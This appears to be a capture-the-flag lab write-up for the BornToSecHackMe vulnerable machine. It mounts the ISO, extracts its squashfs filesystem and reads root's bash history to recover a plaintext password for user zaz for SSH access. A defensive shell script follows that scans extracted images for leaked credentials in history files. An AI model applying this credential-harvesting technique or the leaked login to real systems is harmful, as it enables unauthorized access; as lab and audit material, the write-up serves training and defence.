Since we are given an ISO file to create the vulnerable machine, we could also exploit the ISO directly to make our life easier.
First, using mount we'll get access to its filesystem:
$> sudo mkdir /mnt/iso
$> sudo mount -o loop BornToSecHackMe-v1.1.iso /mnt/iso/
$> ls -l /mnt/iso
total 10
dr-xr-xr-x 2 root root 2048 juin 17 2017 casper
dr-xr-xr-x 2 root root 2048 juin 16 2017 install
dr-xr-xr-x 2 root root 2048 juin 17 2017 isolinux
-r--r--r-- 1 root root 844 juin 17 2017 md5sum.txt
dr-xr-xr-x 2 root root 2048 juin 16 2017 preseed
-r--r--r-- 1 root root 201 juin 17 2017 README.diskdefines
-r--r--r-- 1 root root 0 juin 17 2017 ubuntu
We create a mount point inside /mnt, which is the conventional directory for this. The loop option tells mount to attach the ISO image to an unused loop device so it can be mounted like an ordinary block device.
All these files are used to rebuild the OS, everything installed on top of it and its configuration. This particular ISO uses casper, so in that directory we should find a squashfs file: a compressed image of the whole filesystem. Using unsquashfs we can retrieve every file it contains:
$> sudo unsquashfs /mnt/iso/casper/filesystem.squashfs
Parallel unsquashfs: Using 1 processor
61188 inodes (56421 blocks) to write
It outputs a squashfs-root directory containing what you'd expect from a filesystem, meaning we can retrieve root's command history from the .bash_history file located in its home directory:
$> sudo cat squashfs-root/root/.bash_history
...
adduser zaz
646da671ca01bb5d84dbb5fb2238dc8e
...
adduser creates a new user on this machine. The password was incorrectly input twice at the shell prompt, so it ended up in the history and we can grab it. With this credential pair we can connect directly to the machine via ssh after finding the machine's IP as in Writeup 1, part 1. This shortcut lets us skip straight to the zaz exploit described in Writeup 1, part 6.
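From the defender's side, the lesson of this section is that whatever sits in a home directory when the image is built ships to everyone who downloads it. The following is an added example, not part of the original writeup: a POSIX shell script that scans an extracted tree such as squashfs-root for exactly this pattern (an account-management command followed by a lone token) so an image can be checked before release; the sample tree it builds and the password value in it are constructed.

```shell
# Added example, not part of the original writeup: audit an extracted
# filesystem tree (such as the squashfs-root that unsquashfs produces)
# for shell history files that leak credentials before an image ships.
# The pattern checked is the one found above: an account-management
# command immediately followed by a bare one-word line.
ACCOUNT_CMDS='^(adduser|useradd|passwd|chpasswd|usermod)$'
# One-word lines that are commands in their own right, not passwords.
COMMON_CMDS='^(ls|cd|exit|clear|sudo|su|vi|vim|nano|cat|pwd|history|passwd|id|top|df|free)$'

# List every shell history file under the tree given as $1.
find_history_files() {
    find "$1" -type f \( -name '.bash_history' -o -name '.zsh_history' \
        -o -name '.sh_history' -o -name '.history' \) 2>/dev/null
}

# Print one line per suspected leak in history file $1:
#   <file>:<line>: possible password after "<command>": <token>
scan_history_file() {
    awk -v account="$ACCOUNT_CMDS" -v common="$COMMON_CMDS" '
        /^#[0-9]+$/ { next }        # skip bash HISTTIMEFORMAT timestamps
        armed && NF == 1 && $1 !~ common {
            printf "%s:%d: possible password after \"%s\": %s\n", FILENAME, NR, prev, $0
        }
        { cmd = ($1 == "sudo") ? $2 : $1; armed = (cmd ~ account); prev = $0 }
    ' "$1"
}

# Scan a whole tree and print every finding.
scan_tree() {
    find_history_files "$1" | while IFS= read -r f; do scan_history_file "$f"; done
}

# Number of findings under tree $1, usable as a build gate (0 means clean).
count_leaks() {
    scan_tree "$1" | wc -l | tr -d ' '
}

# Constructed sample tree (not taken from the target image) so the scanner
# can be tried without mounting an ISO; the password value is made up.
make_sample_tree() {
    _d=$(mktemp -d)
    mkdir -p "$_d/root" "$_d/home/bob"
    printf '%s\n' 'ls -la' 'adduser zaz' 'N0tTheRealOne' 'exit' > "$_d/root/.bash_history"
    printf '%s\n' 'cd /tmp' 'passwd' 'passwd' 'history' > "$_d/home/bob/.bash_history"
    printf '%s' "$_d"
}

# Usage: sh audit_history.sh squashfs-root   (defaults to the sample tree)
if [ -n "${1:-}" ]; then scan_tree "$1"; else scan_tree "$(make_sample_tree)"; fi
```

Run it against the squashfs-root directory extracted above to see whether anything else was left behind in the shipped home directories.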